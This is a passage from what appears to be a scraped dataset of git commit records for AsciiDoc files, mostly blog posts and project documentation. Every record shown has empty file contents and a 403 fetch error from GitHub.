ring-boot,NetoDevel\/spring-boot,lburgazzoli\/spring-boot,donhuvy\/spring-boot,michael-simons\/spring-boot,bclozel\/spring-boot,eddumelendez\/spring-boot,mbenson\/spring-boot,jayarampradhan\/spring-boot,hqrt\/jenkins2-course-spring-boot,ptahchiev\/spring-boot,bjornlindstrom\/spring-boot,ilayaperumalg\/spring-boot,kdvolder\/spring-boot,joshiste\/spring-boot,scottfrederick\/spring-boot,Buzzardo\/spring-boot,lenicliu\/spring-boot,lexandro\/spring-boot,kamilszymanski\/spring-boot,shakuzen\/spring-boot,rweisleder\/spring-boot,jmnarloch\/spring-boot,xiaoleiPENG\/my-project,ollie314\/spring-boot,aahlenst\/spring-boot,neo4j-contrib\/spring-boot,DeezCashews\/spring-boot,bclozel\/spring-boot,hello2009chen\/spring-boot,jbovet\/spring-boot,royclarkson\/spring-boot,chrylis\/spring-boot,lenicliu\/spring-boot,htynkn\/spring-boot,i007422\/jenkins2-course-spring-boot,izeye\/spring-boot,philwebb\/spring-boot-concourse,jxblum\/spring-boot,htynkn\/spring-boot,hello2009chen\/spring-boot,mosoft521\/spring-boot,pvorb\/spring-boot,NetoDevel\/spring-boot,hqrt\/jenkins2-course-spring-boot,habuma\/spring-boot,joshthornhill\/spring-boot,bjornlindstrom\/spring-boot,wilkinsona\/spring-boot,kam
ilszymanski\/spring-boot,candrews\/spring-boot,kdvolder\/spring-boot,rweisleder\/spring-boot,linead\/spring-boot,vpavic\/spring-boot,habuma\/spring-boot,shangyi0102\/spring-boot,sbcoba\/spring-boot,yangdd1205\/spring-boot,lburgazzoli\/spring-boot,isopov\/spring-boot,lenicliu\/spring-boot,NetoDevel\/spring-boot,donhuvy\/spring-boot,jvz\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,felipeg48\/spring-boot,rweisleder\/spring-boot,ihoneymon\/spring-boot,yangdd1205\/spring-boot,mbogoevici\/spring-boot,isopov\/spring-boot,scottfrederick\/spring-boot,scottfrederick\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,cleverjava\/jenkins2-course-spring-boot,vakninr\/spring-boot,jvz\/spring-boot,xiaoleiPENG\/my-project,mosoft521\/spring-boot,sbuettner\/spring-boot,mdeinum\/spring-boot,mbenson\/spring-boot,i007422\/jenkins2-course-spring-boot,jvz\/spring-boot,bbrouwer\/spring-boot,habuma\/spring-boot,Nowheresly\/spring-boot,ollie314\/spring-boot,shakuzen\/spring-boot,lucassaldanha\/spring-boot,joshiste\/spring-boot,sbcoba\/spring-boot,joshiste\/spring-boot,ihoneymon\/spring-boot,joshiste\/spring-boot,i007422\/jenkins2-course-spring-boot,drumonii\/spring-boot,lburgazzoli\/spring-boot,shangyi0102\/spring-boot,nebhale\/spring-boot,htynkn\/spring-boot,nebhale\/spring-boot,joshthornhill\/spring-boot,mosoft521\/spring-boot,nebhale\/spring-boot,jmnarloch\/spring-boot,hqrt\/jenkins2-course-spring-boot,ameraljovic\/spring-boot,nebhale\/spring-boot,htynkn\/spring-boot,zhangshuangquan\/spring-root,jxblum\/spring-boot,ptahchiev\/spring-boot,herau\/spring-boot,Buzzardo\/spring-boot,RichardCSantana\/spring-boot,zhanhb\/spring-boot,hello2009chen\/spring-boot,ilayaperumalg\/spring-boot,vpavic\/spring-boot,philwebb\/spring-boot,jbovet\/spring-boot,dreis2211\/spring-boot,kdvolder\/spring-boot,habuma\/spring-boot,philwebb\/spring-boot-concourse,Buzzardo\/spring-boot,izeye\/spring-boot,hqrt\/jenkins2-course-spring-boot,shakuzen\/spring-boot,dfa1\/spring-boot,mrumpf\/spring-boot,tsachev\/spring-boot,ollie314\/spring-boot,pvorb\/spring-boot,sbuettner\/spring-boot,lburgazzoli\/spring-boot,tsachev\/spring-boot,mosoft521\/spring-boot,yhj630520\/spring-boot,bclozel\/spring-boot,vakninr\/spring-boot,royclarkson\/spring-boot,Buzzardo\/spring-boot,royclarkson\/spring-boot,bclozel\/spring-boot,sbcoba\/spring-boot,afroje-reshma\/spring-boot-sample,jmnarloch\/spring-boot,izeye\/spring-boot,philwebb\/spring-boot-concourse,javyzheng\/spring-boot,akmaharshi\/jenkins,qerub\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,eddumelendez\/spring-boot,sebastiankirsch\/spring-boot,lexandro\/spring-boot,herau\/spring-boot,bclozel\/spring-boot,minmay\/spring-boot,candrews\/spring-boot,olivergierke\/spring-boot,eddumelendez\/spring-boot,ollie314\/spring-boot,dreis2211\/spring-boot,scottfrederick\/spring-boot,candrews\/spring-boot,eddumelendez\/spring-boot,cleverjava\/jenkins2-course-spring-boot,tiarebalbi\/spring-boot,ihoneymon\/spring-boot,zhangshuangquan\/spring-root,lucassaldanha\/spring-boot,afroje-reshma\/spring-boot-sample,javyzheng\/spring-boot,isopov\/spring-boot,sebastiankirsch\/spring-boot,izeye\/spring-boot,michael-simons\/spring-boot,Buzzardo\/spring-boot,dreis2211\/spring-boot,philwebb\/spring-boot,olivergierke\/spring-boot,DeezCashews\/spring-boot,jxblum\/spring-boot,wilkinsona\/spring-boot,mbogoevici\/spring-boot,Nowheresly\/spring-boot,royclarkson\/spring-boot,Nowheresly\/spring-boot,jbovet\/spring-boot,vakninr\/spring-boot,spring-projects\/spring-boot,afroje-reshma\/spring-boot-sample,thomasdarimont\/spring-boot,mbe
nson\/spring-boot,donhuvy\/spring-boot,isopov\/spring-boot,olivergierke\/spring-boot,felipeg48\/spring-boot,xiaoleiPENG\/my-project,javyzheng\/spring-boot,ilayaperumalg\/spring-boot,joshthornhill\/spring-boot,bjornlindstrom\/spring-boot,philwebb\/spring-boot-concourse,bijukunjummen\/spring-boot,tsachev\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,lucassaldanha\/spring-boot,tsachev\/spring-boot,SaravananParthasarathy\/SPSDemo,joansmith\/spring-boot,i007422\/jenkins2-course-spring-boot,qerub\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,mdeinum\/spring-boot,dfa1\/spring-boot,joshthornhill\/spring-boot,philwebb\/spring-boot,mrumpf\/spring-boot,mdeinum\/spring-boot,cleverjava\/jenkins2-course-spring-boot,scottfrederick\/spring-boot,kamilszymanski\/spring-boot,drumonii\/spring-boot,pvorb\/spring-boot,felipeg48\/spring-boot,pvorb\/spring-boot,qerub\/spring-boot,ptahchiev\/spring-boot,yhj630520\/spring-boot,drumonii\/spring-boot,donhuvy\/spring-boot,candrews\/spring-boot,kamilszymanski\/spring-boot,mbenson\/spring-boot,afroje-reshma\/spring-boot-sample,aahlenst\/spring-boot,habuma\/spring-boot,zhanhb\/spring-boot,felipeg48\/spring-boot,ptahchiev\/spring-boot,cleverjava\/jenkins2-course-spring-boot,spring-projects\/spring-boot,lucassaldanha\/spring-boot,bijukunjummen\/spring-boot,ameraljovic\/spring-boot,bjornlindstrom\/spring-boot,wilkinsona\/spring-boot,SaravananParthasarathy\/SPSDemo,spring-projects\/spring-boot,jayarampradhan\/spring-boot,jayarampradhan\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,joansmith\/spring-boot,ptahchiev\/spring-boot,bjornlindstrom\/spring-boot,vakninr\/spring-boot,brettwooldridge\/spring-boot,zhanhb\/spring-boot,vakninr\/spring-boot,thomasdarimont\/spring-boot,neo4j-contrib\/spring-boot,htynkn\/spring-boot,Nowheresly\/spring-boot,drumonii\/spring-boot,wilkinsona\/spring-boot,brettwooldridge\/spring-boot,Buzzardo\/spring-boot,minmay\/spring-boot,shakuzen\/spring-boot,deki\/spring-boot,shakuzen\/spring-boot,deki\/spring-boot,hello2009chen\/spring-boot,sbuettner\/spring-boot,DeezCashews\/spring-boot,herau\/spring-boot,rweisleder\/spring-boot,akmaharshi\/jenkins,herau\/spring-boot,olivergierke\/spring-boot,joshthornhill\/spring-boot,kdvolder\/spring-boot,vpavic\/spring-boot,Nowheresly\/spring-boot,tiarebalbi\/spring-boot,javyzheng\/spring-boot,sbcoba\/spring-boot,isopov\/spring-boot,neo4j-contrib\/spring-boot,tiarebalbi\/spring-boot,RichardCSantana\/spring-boot,habuma\/spring-boot,ilayaperumalg\/spring-boot,mbogoevici\/spring-boot,sebastiankirsch\/spring-boot,nebhale\/spring-boot,mosoft521\/spring-boot,izeye\/spring-boot,bijukunjummen\/spring-boot,kdvolder\/spring-boot,NetoDevel\/spring-boot,akmaharshi\/jenkins,linead\/spring-boot,aahlenst\/spring-boot,jayarampradhan\/spring-boot,spring-projects\/spring-boot,mrumpf\/spring-boot,tsachev\/spring-boot,akmaharshi\/jenkins,hqrt\/jenkins2-course-spring-boot,tiarebalbi\/spring-boot,philwebb\/spring-boot,thomasdarimont\/spring-boot,qerub\/spring-boot,mrumpf\/spring-boot,ilayaperumalg\/spring-boot,zhangshuangquan\/spring-root,royclarkson\/spring-boot,felipeg48\/spring-boot,yhj630520\/spring-boot,chrylis\/spring-boot,dfa1\/spring-boot,yhj630520\/spring-boot,philwebb\/spring-boot-concourse,ihoneymon\/spring-boot,DeezCashews\/spring-boot,michael-simons\/spring-boot,mbogoevici\/spring-boot,jxblum\/spring-boot,vpavic\/spring-boot,SaravananParthasarathy\/SPSDemo,mdeinum\/spring-boot,joshiste\/spring-boot,dreis2211\/spring-boot,bbrouwer\/spring-boot,jvz\/spring-boot,bclozel\/spring-boot,zhangshuangquan\/spring-ro
ot,wilkinsona\/spring-boot,zhanhb\/spring-boot,mbogoevici\/spring-boot,mrumpf\/spring-boot,shangyi0102\/spring-boot,shangyi0102\/spring-boot,aahlenst\/spring-boot,SaravananParthasarathy\/SPSDemo,ihoneymon\/spring-boot,jvz\/spring-boot,spring-projects\/spring-boot,kamilszymanski\/spring-boot,neo4j-contrib\/spring-boot,kdvolder\/spring-boot,lexandro\/spring-boot,jmnarloch\/spring-boot,shakuzen\/spring-boot,sebastiankirsch\/spring-boot,xiaoleiPENG\/my-project,scottfrederick\/spring-boot,minmay\/spring-boot,thomasdarimont\/spring-boot,minmay\/spring-boot,aahlenst\/spring-boot,donhuvy\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,mdeinum\/spring-boot,eddumelendez\/spring-boot,lenicliu\/spring-boot,yangdd1205\/spring-boot,neo4j-contrib\/spring-boot,cleverjava\/jenkins2-course-spring-boot,felipeg48\/spring-boot,zhanhb\/spring-boot,joansmith\/spring-boot,ihoneymon\/spring-boot,zhangshuangquan\/spring-root,linead\/spring-boot,shangyi0102\/spring-boot,michael-simons\/spring-boot,philwebb\/spring-boot,lucassaldanha\/spring-boot,ptahchiev\/spring-boot,mbenson\/spring-boot,herau\/spring-boot,olivergierke\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,ollie314\/spring-boot,isopov\/spring-boot,donhuvy\/spring-boot,lexandro\/spring-boot,candrews\/spring-boot,RichardCSantana\/spring-boot,zhanhb\/spring-boot,bbrouwer\/spring-boot,sbuettner\/spring-boot,hello2009chen\/spring-boot,RichardCSantana\/spring-boot,tsachev\/spring-boot,DeezCashews\/spring-boot,wilkinsona\/spring-boot,deki\/spring-boot,ameraljovic\/spring-boot,i007422\/jenkins2-course-spring-boot,joshiste\/spring-boot,bbrouwer\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,joansmith\/spring-boot,qerub\/spring-boot,michael-simons\/spring-boot,minmay\/spring-boot,akmaharshi\/jenkins,afroje-reshma\/spring-boot-sample,lexandro\/spring-boot,vpavic\/spring-boot,linead\/spring-boot,mbenson\/spring-boot,chrylis\/spring-boot,brettwooldridge\/spring-boot,joansmith\/spring-boot,dreis2211\/spring-boot,drumonii\/spring-boot,rweisleder\/spring-boot,linead\/spring-boot,tiarebalbi\/spring-boot,philwebb\/spring-boot,chrylis\/spring-boot,ameraljovic\/spring-boot,RichardCSantana\/spring-boot,jbovet\/spring-boot,dreis2211\/spring-boot,aahlenst\/spring-boot,jayarampradhan\/spring-boot","old_file":"spring-boot-docs\/src\/main\/asciidoc\/using-spring-boot.adoc","new_file":"spring-boot-docs\/src\/main\/asciidoc\/using-spring-boot.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mbogoevici\/spring-boot.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"1aa55a5ac9270c7ef837ba606a3be543873b6e3f","subject":"Update 2016-06-24-mintia-and-frisk-by-arduino.adoc","message":"Update 2016-06-24-mintia-and-frisk-by-arduino.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-06-24-mintia-and-frisk-by-arduino.adoc","new_file":"_posts\/2016-06-24-mintia-and-frisk-by-arduino.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a88a50a8e079dff92e0a11b3ff392b235dc98b11","subject":"Update 2016-06-28-Edutech.adoc","message":"Update 
2016-06-28-Edutech.adoc","repos":"iveskins\/iveskins.github.io,iveskins\/iveskins.github.io,iveskins\/iveskins.github.io,iveskins\/iveskins.github.io","old_file":"_posts\/2016-06-28-Edutech.adoc","new_file":"_posts\/2016-06-28-Edutech.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/iveskins\/iveskins.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3c18cb972f7c2499a2597d52b4705411b9805c6b","subject":"Update 2016-08-10-Lattice.adoc","message":"Update 2016-08-10-Lattice.adoc","repos":"cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io","old_file":"_posts\/2016-08-10-Lattice.adoc","new_file":"_posts\/2016-08-10-Lattice.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cothan\/cothan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ba3b88529d2b38f0091e909cf5b93a2c0e92da39","subject":"Update 2017-06-02-Azure-4.adoc","message":"Update 2017-06-02-Azure-4.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-06-02-Azure-4.adoc","new_file":"_posts\/2017-06-02-Azure-4.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ca3b6084cbc0317764f9ce7496635f8a506b28f0","subject":"y2b create post Can You Solve This iPhone Puzzle?","message":"y2b create post Can You Solve This iPhone Puzzle?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-11-03-Can-You-Solve-This-iPhone-Puzzle.adoc","new_file":"_posts\/2016-11-03-Can-You-Solve-This-iPhone-Puzzle.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6e58eb21503de2c0f055998b19525fc3bef88635","subject":"Update 2017-05-06-Dependency-Injection-demistified.adoc","message":"Update 2017-05-06-Dependency-Injection-demistified.adoc","repos":"carlomorelli\/carlomorelli.github.io,carlomorelli\/carlomorelli.github.io,carlomorelli\/carlomorelli.github.io,carlomorelli\/carlomorelli.github.io","old_file":"_posts\/2017-05-06-Dependency-Injection-demistified.adoc","new_file":"_posts\/2017-05-06-Dependency-Injection-demistified.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/carlomorelli\/carlomorelli.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8cf15debf2f0b802a05fa5213c294c43138902e3","subject":"start of API doc","message":"start of API doc\n","repos":"sirjorj\/libxwing","old_file":"API.adoc","new_file":"API.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sirjorj\/libxwing.git\/': The requested URL returned error: 403\n","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"64f01ef02a77eba87ad886b51a8ed4ecc8eb68b9","subject":"y2b 
create post Building the Super Macbook Pro","message":"y2b create post Building the Super Macbook Pro","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-05-28-Building-the-Super-Macbook-Pro.adoc","new_file":"_posts\/2013-05-28-Building-the-Super-Macbook-Pro.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b4faab212e36b0c96523d536ea0400f245c848c4","subject":"Update 2019-03-23-Graph-Q-L-graphql-laravellighthouse.adoc","message":"Update 2019-03-23-Graph-Q-L-graphql-laravellighthouse.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2019-03-23-Graph-Q-L-graphql-laravellighthouse.adoc","new_file":"_posts\/2019-03-23-Graph-Q-L-graphql-laravellighthouse.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4f013e6f558dec362d8b6c02a2ae0d1c2b0d1430","subject":"Update 2016-04-03-etat-limite-personnalite-borderline.adoc","message":"Update 2016-04-03-etat-limite-personnalite-borderline.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-04-03-etat-limite-personnalite-borderline.adoc","new_file":"_posts\/2016-04-03-etat-limite-personnalite-borderline.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a725d1f5099e3e6949d04a4ae3f8b85c9c79f1be","subject":"New Event - ClojureBridge London May 2019","message":"New Event - ClojureBridge London May 2019\n\nAdding to the Clojure.org events section the next ClojureBridge London event to\nbe held in May 2019.\n","repos":"clojure\/clojure-site","old_file":"content\/events\/2019\/clojurebridge-london-may-2019.adoc","new_file":"content\/events\/2019\/clojurebridge-london-may-2019.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"24f8fe3b2e9b746ca7f0ce0501e32923ee9452e3","subject":"y2b create post LEVITATING SPEAKER = MIND BLOWN!","message":"y2b create post LEVITATING SPEAKER = MIND BLOWN!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2015-10-25-LEVITATING-SPEAKER--MIND-BLOWN.adoc","new_file":"_posts\/2015-10-25-LEVITATING-SPEAKER--MIND-BLOWN.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"94f3d6f269352415a9829ac350f31e2d7efe98c8","subject":"Update 2016-04-12-Randy-Pausch-on-How-to-Achieve-your-Childhood-Dreams-too-good-to-be-true.adoc","message":"Update 
2016-04-12-Randy-Pausch-on-How-to-Achieve-your-Childhood-Dreams-too-good-to-be-true.adoc","repos":"wattsap\/wattsap.github.io,wattsap\/wattsap.github.io,wattsap\/wattsap.github.io,wattsap\/wattsap.github.io","old_file":"_posts\/2016-04-12-Randy-Pausch-on-How-to-Achieve-your-Childhood-Dreams-too-good-to-be-true.adoc","new_file":"_posts\/2016-04-12-Randy-Pausch-on-How-to-Achieve-your-Childhood-Dreams-too-good-to-be-true.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/wattsap\/wattsap.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e891608f5033bef1826d768df1b44e53ece0c489","subject":"Update 2016-11-07-Healthcare-has-a-No-Problem-Problem.adoc","message":"Update 2016-11-07-Healthcare-has-a-No-Problem-Problem.adoc","repos":"fqure\/fqure.github.io,fqure\/fqure.github.io,fqure\/fqure.github.io,fqure\/fqure.github.io","old_file":"_posts\/2016-11-07-Healthcare-has-a-No-Problem-Problem.adoc","new_file":"_posts\/2016-11-07-Healthcare-has-a-No-Problem-Problem.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fqure\/fqure.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4a26bf194aec52e883d05f14803f9045029c0667","subject":"Update 2016-03-10-Grand-Central-Dispatch-i-O-S.adoc","message":"Update 2016-03-10-Grand-Central-Dispatch-i-O-S.adoc","repos":"jtsiros\/jtsiros.github.io,jtsiros\/jtsiros.github.io,jtsiros\/jtsiros.github.io,jtsiros\/jtsiros.github.io","old_file":"_posts\/2016-03-10-Grand-Central-Dispatch-i-O-S.adoc","new_file":"_posts\/2016-03-10-Grand-Central-Dispatch-i-O-S.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jtsiros\/jtsiros.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9f944c0920f713f51c986776dd121e9255d07f13","subject":"Deleted 2015-5-10-uGui.adoc","message":"Deleted 2015-5-10-uGui.adoc","repos":"TheGertproject\/TheGertproject.github.io,TheGertproject\/TheGertproject.github.io,TheGertproject\/TheGertproject.github.io","old_file":"2015-5-10-uGui.adoc","new_file":"2015-5-10-uGui.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/TheGertproject\/TheGertproject.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8421b2917adf1bd6b96bd06254c1242cf015e72d","subject":"Several additions to Developers Manual","message":"Several additions to Developers Manual\n","repos":"Armatiek\/xslweb,Armatiek\/xslweb,Armatiek\/xslweb,Armatiek\/xslweb","old_file":"docs\/XSLWeb Developer Manual.adoc","new_file":"docs\/XSLWeb Developer Manual.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Armatiek\/xslweb.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c8bd749303a03bde705df75102808e81454467d4","subject":"Added documentation about events, cross site scripting prevention, the new XPath extension function transform() and the new stylesheet parameter $req:request-xml-doc that is passed to every pipeline transformation step.","message":"Added documentation about events, cross site scripting prevention, the new XPath extension function transform() and the new stylesheet parameter $req:request-xml-doc that is passed 
to every pipeline transformation step.\n","repos":"Armatiek\/xslweb,Armatiek\/xslweb,Armatiek\/xslweb,Armatiek\/xslweb","old_file":"docs\/XSLWeb Developer Manual.adoc","new_file":"docs\/XSLWeb Developer Manual.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Armatiek\/xslweb.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"dbc943f7bf374f86ea5785dca98d7a3dfde39bbe","subject":"[docs] Update Impala links to the Apache docs\/wiki","message":"[docs] Update Impala links to the Apache docs\/wiki\n\nChange-Id: I77f02823f421ab801ac3b6a03cc69a4075c63c23\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/9904\nTested-by: Kudu Jenkins\nReviewed-by: Adar Dembo <866ca730bfc7f544e3ebce604ceeba4879f23df0@cloudera.com>\n","repos":"InspurUSA\/kudu,helifu\/kudu,andrwng\/kudu,cloudera\/kudu,InspurUSA\/kudu,helifu\/kudu,helifu\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,helifu\/kudu,andrwng\/kudu,helifu\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,andrwng\/kudu,andrwng\/kudu,cloudera\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,helifu\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,andrwng\/kudu,cloudera\/kudu,InspurUSA\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,helifu\/kudu,andrwng\/kudu,cloudera\/kudu,cloudera\/kudu,InspurUSA\/kudu,InspurUSA\/kudu","old_file":"docs\/kudu_impala_integration.adoc","new_file":"docs\/kudu_impala_integration.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"af6b68d75945aa24b5ffd322a5c348c15c3e8ad1","subject":"Update 2017-07-09-Serverless-Framework-E-C-M-A-Script2015-1.adoc","message":"Update 2017-07-09-Serverless-Framework-E-C-M-A-Script2015-1.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-07-09-Serverless-Framework-E-C-M-A-Script2015-1.adoc","new_file":"_posts\/2017-07-09-Serverless-Framework-E-C-M-A-Script2015-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"393d4e60993a9450ccacff2bd7ee0dab9fa7d831","subject":"Update 2015-05-17-Leonardo-da-Gerti.adoc","message":"Update 2015-05-17-Leonardo-da-Gerti.adoc","repos":"TheGertproject\/TheGertproject.github.io,TheGertproject\/TheGertproject.github.io,TheGertproject\/TheGertproject.github.io","old_file":"_posts\/2015-05-17-Leonardo-da-Gerti.adoc","new_file":"_posts\/2015-05-17-Leonardo-da-Gerti.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/TheGertproject\/TheGertproject.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"442eb944ddfea12553b47a78c4479448c7d80fe0","subject":"Update 2016-07-24-OSX-cache-clean.adoc","message":"Update 
2016-07-24-OSX-cache-clean.adoc","repos":"cegohub\/cegohub.github.io,cegohub\/cegohub.github.io,cegohub\/cegohub.github.io,cegohub\/cegohub.github.io","old_file":"_posts\/2016-07-24-OSX-cache-clean.adoc","new_file":"_posts\/2016-07-24-OSX-cache-clean.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cegohub\/cegohub.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e9ff4816d76b72194fdb59457acc550bd570b629","subject":"Add migration guide to documentation (#8283)","message":"Add migration guide to documentation (#8283)\n\n* Migration guide 1st draft\n\n* Restructure and improve migration guide\n\n* Update migrating-to-vaadin8.asciidoc\n","repos":"Darsstar\/framework,peterl1084\/framework,peterl1084\/framework,kironapublic\/vaadin,Legioth\/vaadin,Legioth\/vaadin,Legioth\/vaadin,mstahv\/framework,mstahv\/framework,kironapublic\/vaadin,asashour\/framework,asashour\/framework,asashour\/framework,Darsstar\/framework,mstahv\/framework,kironapublic\/vaadin,Darsstar\/framework,Darsstar\/framework,peterl1084\/framework,kironapublic\/vaadin,kironapublic\/vaadin,Legioth\/vaadin,asashour\/framework,peterl1084\/framework,mstahv\/framework,peterl1084\/framework,asashour\/framework,Legioth\/vaadin,mstahv\/framework,Darsstar\/framework","old_file":"documentation\/migration\/migrating-to-vaadin8.asciidoc","new_file":"documentation\/migration\/migrating-to-vaadin8.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/peterl1084\/framework.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"803189b92301ccd0857e940d87cf225a79bed3fe","subject":"Update 2015-10-30-The-Lost-Days.adoc","message":"Update 2015-10-30-The-Lost-Days.adoc","repos":"gilangdanu\/blog,gilangdanu\/blog,gilangdanu\/blog","old_file":"_posts\/2015-10-30-The-Lost-Days.adoc","new_file":"_posts\/2015-10-30-The-Lost-Days.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gilangdanu\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"056763cad3f9505505c3fe4a187a0ed5764e556c","subject":"Update 2017-02-15-Async-Await-enabled-with-Babel-in-code.adoc","message":"Update 